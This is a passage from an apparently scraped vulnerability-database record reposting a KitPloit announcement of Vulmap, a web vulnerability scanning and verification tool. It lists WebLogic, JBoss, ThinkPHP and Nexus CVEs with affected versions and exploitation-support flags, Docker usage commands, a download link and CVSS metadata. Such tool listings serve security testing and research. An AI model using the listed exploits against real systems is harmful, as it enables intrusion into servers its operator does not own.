vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 
3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, 
"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}